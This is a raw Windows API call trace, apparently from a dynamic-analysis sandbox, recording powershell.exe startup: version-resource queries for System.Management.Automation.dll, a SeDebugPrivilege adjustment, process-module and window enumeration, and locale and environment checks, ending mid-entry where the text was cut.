[0087.875] lstrcpyW (in: lpString1=0x3953b0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0087.875] VerQueryValueW (in: pBlock=0x2bc4d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x13e984, puLen=0x13e980 | out: lplpBuffer=0x13e984*=0x2bc4ef4, puLen=0x13e980) returned 1 [0087.875] lstrlenW (lpString="System.Management.Automation") returned 28 [0087.876] lstrcpyW (in: lpString1=0x3953b0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0087.876] VerQueryValueW (in: pBlock=0x2bc4d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x13e984, puLen=0x13e980 | out: lplpBuffer=0x13e984*=0x2bc4f50, puLen=0x13e980) returned 1 [0087.876] lstrlenW (lpString="6.1.7601.17514") returned 14 [0087.876] lstrcpyW (in: lpString1=0x3953b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0087.876] VerQueryValueW (in: pBlock=0x2bc4d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x13e984, puLen=0x13e980 | out: lplpBuffer=0x13e984*=0x2bc4f90, puLen=0x13e980) returned 1 [0087.876] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0087.876] lstrcpyW (in: lpString1=0x3953b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0087.876] VerQueryValueW (in: pBlock=0x2bc4d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x13e984, puLen=0x13e980 | out: lplpBuffer=0x13e984*=0x2bc4ff8, puLen=0x13e980) returned 1 [0087.876] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0087.876] lstrcpyW (in: lpString1=0x3953b0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0087.876] VerQueryValueW (in: pBlock=0x2bc4d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x13e984, puLen=0x13e980 | out: lplpBuffer=0x13e984*=0x2bc5094, puLen=0x13e980) returned 1 [0087.876] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0087.876] lstrcpyW (in: lpString1=0x3953b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0087.876] VerQueryValueW (in: pBlock=0x2bc4d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x13e984, puLen=0x13e980 | out: lplpBuffer=0x13e984*=0x2bc50f8, puLen=0x13e980) returned 1 [0087.876] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0087.876] lstrcpyW (in: lpString1=0x3953b0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0087.876] VerQueryValueW (in: pBlock=0x2bc4d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x13e984, puLen=0x13e980 | out: lplpBuffer=0x13e984*=0x2bc5174, puLen=0x13e980) returned 1 [0087.876] lstrlenW (lpString="6.1.7601.17514") returned 14 [0087.876] lstrcpyW (in: lpString1=0x3953b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0087.876] VerQueryValueW (in: pBlock=0x2bc4d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x13e984, puLen=0x13e980 | out: lplpBuffer=0x13e984*=0x2bc4e1c, puLen=0x13e980) returned 1 [0087.876] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0087.876] lstrcpyW (in: lpString1=0x3953b0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0087.877] VerQueryValueW (in: pBlock=0x2bc4d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x13e984, puLen=0x13e980 | out: lplpBuffer=0x13e984*=0x0, puLen=0x13e980) returned 0 [0087.877] VerQueryValueW (in: pBlock=0x2bc4d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x13e984, puLen=0x13e980 | out: lplpBuffer=0x13e984*=0x0, puLen=0x13e980) returned 0 [0087.877] VerQueryValueW (in: pBlock=0x2bc4d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x13e984, puLen=0x13e980 | out: lplpBuffer=0x13e984*=0x0, puLen=0x13e980) returned 0 [0087.877] VerQueryValueW (in: pBlock=0x2bc4d28, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x13e978, puLen=0x13e974 | out: lplpBuffer=0x13e978*=0x2bc4dc4, puLen=0x13e974) returned 1 [0087.877] VerLanguageNameW (in: wLang=0x0, szLang=0x3953b0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0087.884] VerQueryValueW (in: pBlock=0x2bc4d28, lpSubBlock="\\", lplpBuffer=0x13e98c, puLen=0x13e988 | out: lplpBuffer=0x13e98c*=0x2bc4d50, puLen=0x13e988) returned 1 [0087.890] GetCurrentProcessId () returned 0x578 [0087.902] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x13e1c4 | out: lpLuid=0x13e1c4*(LowPart=0x14, HighPart=0)) returned 1 [0087.904] GetLastError () returned 0x0 [0087.905] GetCurrentProcess () returned 0xffffffff [0087.905] GetLastError () returned 0x0 [0087.906] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x13e1c0 | out: TokenHandle=0x13e1c0*=0x30c) returned 1 [0087.906] GetLastError () returned 0x0 [0087.908] AdjustTokenPrivileges (in: TokenHandle=0x30c, DisableAllPrivileges=0, NewState=0x2bc7868*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0087.908] GetLastError () returned 0x514 [0087.909] CloseHandle (hObject=0x30c) returned 1 [0087.909] GetLastError () returned 0x514 [0087.913] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x578) returned 0x30c [0087.913] GetLastError () returned 0x514 [0087.925] EnumProcessModules (in: hProcess=0x30c, lphModule=0x2bc78ac, cb=0x100, lpcbNeeded=0x13e9b4 | out: lphModule=0x2bc78ac, lpcbNeeded=0x13e9b4) returned 1 [0087.926] GetLastError () returned 0x514 [0087.928] GetModuleInformation (in: hProcess=0x30c, hModule=0x21a70000, lpmodinfo=0x2bc79ec, cb=0xc | out: lpmodinfo=0x2bc79ec*(lpBaseOfDll=0x21a70000, SizeOfImage=0x72000, EntryPoint=0x21a77363)) returned 1 [0087.928] GetLastError () returned 0x514 [0087.931] GetModuleBaseNameW (in: hProcess=0x30c, hModule=0x21a70000, lpBaseName=0x37b268, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0087.931] GetLastError () returned 0x514 [0087.932] GetModuleFileNameExW (in: hProcess=0x30c, hModule=0x21a70000, lpFilename=0x37b268, nSize=0x800 | out: lpFilename="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0087.932] GetLastError () returned 0x514 [0087.932] CloseHandle (hObject=0x30c) returned 1 [0087.932] GetLastError () returned 0x514 [0087.935] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x578) returned 0x30c [0087.935] GetLastError () returned 0x514 [0087.937] GetExitCodeProcess (in: hProcess=0x30c, lpExitCode=0x2bc6e9c | out: lpExitCode=0x2bc6e9c*=0x103) returned 1 [0087.937] GetLastError () returned 0x514 [0087.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3bc5278, Length=0x20000, ResultLength=0x13e9fc | out: SystemInformation=0x3bc5278, ResultLength=0x13e9fc*=0x80b0) returned 0x0 [0087.958] EnumWindows (lpEnumFunc=0x2af3612, lParam=0x0) returned 1 [0087.961] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x56c [0087.961] GetLastError () returned 0x514 [0087.961] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5f8 [0087.961] GetLastError () returned 0x514 [0087.961] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.961] GetLastError () returned 0x514 [0087.961] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x7ac [0087.961] GetLastError () returned 0x514 [0087.961] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x7ac [0087.961] GetLastError () returned 0x514 [0087.962] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.962] GetLastError () returned 0x514 [0087.962] GetWindowThreadProcessId (in: hWnd=0x200dc, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.962] GetLastError () returned 0x514 [0087.962] GetWindowThreadProcessId (in: hWnd=0x200d8, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.962] GetLastError () returned 0x514 [0087.962] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.962] GetLastError () returned 0x514 [0087.962] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.962] GetLastError () returned 0x514 [0087.962] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.962] GetLastError () returned 0x514 [0087.962] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.962] GetLastError () returned 0x514 [0087.962] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.962] GetLastError () returned 0x514 [0087.962] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.962] GetLastError () returned 0x514 [0087.962] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.962] GetLastError () returned 0x514 [0087.962] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.963] GetLastError () returned 0x514 [0087.963] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.963] GetLastError () returned 0x514 [0087.963] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x550 [0087.963] GetLastError () returned 0x514 [0087.963] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.963] GetLastError () returned 0x514 [0087.963] GetWindowThreadProcessId (in: hWnd=0x10094, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.963] GetLastError () returned 0x514 [0087.963] GetWindowThreadProcessId (in: hWnd=0x200f0, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.963] GetLastError () returned 0x514 [0087.963] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x4c8 [0087.963] GetLastError () returned 0x514 [0087.963] GetWindowThreadProcessId (in: hWnd=0x10148, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5c4 [0087.963] GetLastError () returned 0x514 [0087.964] GetWindow (hWnd=0x10148, uCmd=0x4) returned 0x0 [0087.965] IsWindowVisible (hWnd=0x10148) returned 0 [0087.966] GetWindowThreadProcessId (in: hWnd=0x1013e, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x4c8 [0087.966] GetLastError () returned 0x514 [0087.966] GetWindowThreadProcessId (in: hWnd=0x10120, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x678 [0087.966] GetLastError () returned 0x514 [0087.966] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x56c [0087.966] GetLastError () returned 0x514 [0087.966] GetWindowThreadProcessId (in: hWnd=0x10156, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x56c [0087.966] GetLastError () returned 0x514 [0087.966] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x610 [0087.966] GetLastError () returned 0x514 [0087.966] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x56c [0087.966] GetLastError () returned 0x514 [0087.966] GetWindowThreadProcessId (in: hWnd=0x1011e, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x678 [0087.966] GetLastError () returned 0x514 [0087.966] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x678 [0087.966] GetLastError () returned 0x514 [0087.966] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x678 [0087.966] GetLastError () returned 0x514 [0087.966] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x110 [0087.966] GetLastError () returned 0x514 [0087.967] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x110 [0087.967] GetLastError () returned 0x514 [0087.967] GetWindowThreadProcessId (in: hWnd=0x200ac, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.967] GetLastError () returned 0x514 [0087.967] GetWindowThreadProcessId (in: hWnd=0x200c6, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.967] GetLastError () returned 0x514 [0087.967] GetWindowThreadProcessId (in: hWnd=0x300ae, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.967] GetLastError () returned 0x514 [0087.967] GetWindowThreadProcessId (in: hWnd=0x200bc, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.967] GetLastError () returned 0x514 [0087.967] GetWindowThreadProcessId (in: hWnd=0x200c4, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.967] GetLastError () returned 0x514 [0087.967] GetWindowThreadProcessId (in: hWnd=0x300c8, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.967] GetLastError () returned 0x514 [0087.967] GetWindowThreadProcessId (in: hWnd=0x700a8, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.967] GetLastError () returned 0x514 [0087.967] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x6f4 [0087.967] GetLastError () returned 0x514 [0087.967] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x698 [0087.967] GetLastError () returned 0x514 [0087.968] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x550 [0087.968] GetLastError () returned 0x514 [0087.968] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x664 [0087.968] GetLastError () returned 0x514 [0087.968] GetWindowThreadProcessId (in: hWnd=0x50096, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.968] GetLastError () returned 0x514 [0087.968] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x638 [0087.968] GetLastError () returned 0x514 [0087.968] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.968] GetLastError () returned 0x514 [0087.968] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.968] GetLastError () returned 0x514 [0087.968] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.968] GetLastError () returned 0x514 [0087.968] GetWindowThreadProcessId (in: hWnd=0x1006c, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.968] GetLastError () returned 0x514 [0087.968] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.968] GetLastError () returned 0x514 [0087.968] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x550 [0087.968] GetLastError () returned 0x514 [0087.968] GetWindowThreadProcessId (in: hWnd=0x2004c, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x550 [0087.969] GetLastError () returned 0x514 [0087.969] GetWindowThreadProcessId (in: hWnd=0x30046, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x4dc [0087.969] GetLastError () returned 0x514 [0087.969] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x530 [0087.969] GetLastError () returned 0x514 [0087.969] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x7ac [0087.969] GetLastError () returned 0x514 [0087.969] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x550 [0087.969] GetLastError () returned 0x514 [0087.969] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5f8 [0087.969] GetLastError () returned 0x514 [0087.969] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.969] GetLastError () returned 0x514 [0087.969] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5b4 [0087.969] GetLastError () returned 0x514 [0087.969] GetWindowThreadProcessId (in: hWnd=0x1014a, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x5ec [0087.969] GetLastError () returned 0x514 [0087.969] GetWindowThreadProcessId (in: hWnd=0x10140, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x4c8 [0087.969] GetLastError () returned 0x514 [0087.970] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x678 [0087.970] GetLastError () returned 0x514 [0087.970] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x678 [0087.970] GetLastError () returned 0x514 [0087.970] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x610 [0087.970] GetLastError () returned 0x514 [0087.970] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x56c [0087.970] GetLastError () returned 0x514 [0087.970] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x110 [0087.970] GetLastError () returned 0x514 [0087.970] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x6f4 [0087.970] GetLastError () returned 0x514 [0087.970] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x550 [0087.970] GetLastError () returned 0x514 [0087.970] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x550 [0087.970] GetLastError () returned 0x514 [0087.970] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x4dc [0087.970] GetLastError () returned 0x514 [0087.970] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x13e650 | out: lpdwProcessId=0x13e650) returned 0x7ac [0087.970] GetLastError () returned 0x514 [0087.970] GetLastError () returned 0x514 [0087.972] WerSetFlags () returned 0x0 [0087.980] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0087.982] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x13ea2c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x13ea28 | out: pulNumLanguages=0x13ea2c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x13ea28) returned 1 [0087.982] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x13ea2c, pwszLanguagesBuffer=0x2bd8648, pcchLanguagesBuffer=0x13ea28 | out: pulNumLanguages=0x13ea2c, pwszLanguagesBuffer=0x2bd8648, pcchLanguagesBuffer=0x13ea28) returned 1 [0087.986] GetUserDefaultLocaleName (in: lpLocaleName=0x3953b0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0088.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0088.003] GetLastError () returned 0xcb [0088.005] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0088.005] GetLastError () returned 0xcb [0088.007] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0088.007] GetLastError () returned 0xcb [0088.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e49c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0088.014] GetLastError () returned 0xcb [0088.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e4b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0088.014] GetLastError () returned 0xcb [0088.014] SetErrorMode (uMode=0x1) returned 0x1 [0088.014] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x13e938 | out: lpFileInformation=0x13e938*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0088.014] GetLastError () returned 0xcb [0088.014] SetErrorMode (uMode=0x1) returned 0x1 [0088.014] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x13e9bc | out: lpdwHandle=0x13e9bc) returned 0x94c [0088.016] GetLastError () returned 0x0 [0088.016] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bdab78 | out: lpData=0x2bdab78) returned 1 [0088.018] VerQueryValueW (in: pBlock=0x2bdab78, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x13e988, puLen=0x13e984 | out: lplpBuffer=0x13e988*=0x2bdac14, puLen=0x13e984) returned 1 [0088.018] VerQueryValueW (in: pBlock=0x2bdab78, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x13e904, puLen=0x13e900 | out: lplpBuffer=0x13e904*=0x2bdacf0, puLen=0x13e900) returned 1 [0088.018] lstrlenW (lpString="Microsoft Corporation") returned 21 [0088.018] lstrcpyW (in: lpString1=0x3953b0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0088.018] VerQueryValueW (in: pBlock=0x2bdab78, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x13e904, puLen=0x13e900 | out: lplpBuffer=0x13e904*=0x2bdad44, puLen=0x13e900) returned 1 [0088.018] lstrlenW (lpString="System.Management.Automation") returned 28 [0088.018] lstrcpyW (in: lpString1=0x3953b0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0088.018] VerQueryValueW (in: pBlock=0x2bdab78, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x13e904, puLen=0x13e900 | out: lplpBuffer=0x13e904*=0x2bdada0, puLen=0x13e900) returned 1 [0088.018] lstrlenW (lpString="6.1.7601.17514") returned 14 [0088.018] lstrcpyW (in: lpString1=0x3953b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0088.018] VerQueryValueW (in: pBlock=0x2bdab78, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x13e904, puLen=0x13e900 | out: lplpBuffer=0x13e904*=0x2bdade0, puLen=0x13e900) returned 1 [0088.018] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0088.018] lstrcpyW (in: lpString1=0x3953b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0088.018] VerQueryValueW (in: pBlock=0x2bdab78, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x13e904, puLen=0x13e900 | out: lplpBuffer=0x13e904*=0x2bdae48, puLen=0x13e900) returned 1 [0088.018] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0088.018] lstrcpyW (in: lpString1=0x3953b0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0088.018] VerQueryValueW (in: pBlock=0x2bdab78, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x13e904, puLen=0x13e900 | out: lplpBuffer=0x13e904*=0x2bdaee4, puLen=0x13e900) returned 1 [0088.018] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0088.018] lstrcpyW (in: lpString1=0x3953b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0088.018] VerQueryValueW (in: pBlock=0x2bdab78, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x13e904, puLen=0x13e900 | out: lplpBuffer=0x13e904*=0x2bdaf48, puLen=0x13e900) returned 1 [0088.018] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0088.018] lstrcpyW (in: 